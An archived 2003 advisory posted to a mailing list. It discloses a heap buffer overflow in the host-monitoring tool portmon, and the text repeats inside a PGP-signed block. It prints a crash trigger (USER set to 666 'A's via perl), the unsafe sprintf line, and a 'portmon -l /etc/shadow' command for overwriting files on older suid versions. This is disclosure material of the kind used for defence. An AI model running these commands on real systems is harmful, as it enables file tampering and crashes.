i find something when i try portmon out for a ride. this is the home
of portmon -
http://aboleo.net/software/portmon/
portmon is software that replaces shell script ping & cron to test the
hosts.
this is what i find -
portmon 1.8 and earlier buffer overflow:
[user@localhost]# export USER=`perl -e 'print "A" x 666'`
/* 110 suffice but i like 66 since the vendor is named old nik! ! */
[user@localhost]# /usr/local/bin/portmon -c devilzride.txt
Segmentation fault (core dumped)
bad code in portmon.c
sprintf(err_msg, "Portmon started by user %s\n", getenv("USER"));
err_msg declare as a -
err_msg = (char *)malloc(128 * sizeof(char));
1.8 is no longer suid root ! probably not an exploitation (in <=1.7)
becuz there is nothing on heap to write over and n1xo does not like to
use the free() (teehe, grep free turns up the dust , who needs the free()
anyhow!) .. maybe you find a way ?
USER is not a trusted one and you can spoof the logs or trash the files
by exploit this guy in <1.8:
portmon -l /etc/shadow
see - http://www.securityfocus.com/archive/1/325653/2003-06-15/2003-06-
21/0
fix :
n1xo said he make a code to fix this one. ask him :
Nik Reiman <nik (at) aboleo (dot) net [email concealed]>
greetz :
ts (at) securityorfice (dot) net [email concealed] is the only one werth the props !
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
holo,
i find something when i try portmon out for a ride. this is the home
of portmon -
http://aboleo.net/software/portmon/
portmon is software that replaces shell script ping & cron to test the
hosts.
this is what i find -
portmon 1.8 and earlier buffer overflow:
[user@localhost]# export USER=`perl -e 'print "A" x 666'`
/* 110 suffice but i like 66 since the vendor is named old nik! ! */
[user@localhost]# /usr/local/bin/portmon -c devilzride.txt
Segmentation fault (core dumped)
bad code in portmon.c
sprintf(err_msg, "Portmon started by user %s\n", getenv("USER"));
err_msg declare as a -
err_msg = (char *)malloc(128 * sizeof(char));
1.8 is no longer suid root ! probably not an exploitation (in <=1.7)
becuz there is nothing on heap to write over and n1xo does not like to
use the free() (teehe, grep free turns up the dust , who needs the free()
anyhow!) .. maybe you find a way ?
USER is not a trusted one and you can spoof the logs or trash the files
by exploit this guy in <1.8:
portmon -l /etc/shadow
see - http://www.securityfocus.com/archive/1/325653/2003-06-15/2003-06-
21/0
fix :
n1xo said he make a code to fix this one. ask him :
Nik Reiman <nik (at) aboleo (dot) net [email concealed]>
greetz :
ts (at) securityorfice (dot) net [email concealed] is the only one werth the props !
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.3
wkYEARECAAYFAj74zFIACgkQarKSBij8yIKdywCfdB0dk3LfrnMXjMYTPT4HSZwGRcoA
n0Z+Y3LYt1T8JKCWRYDCEIThCceo
=G6hd
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
[ reply ]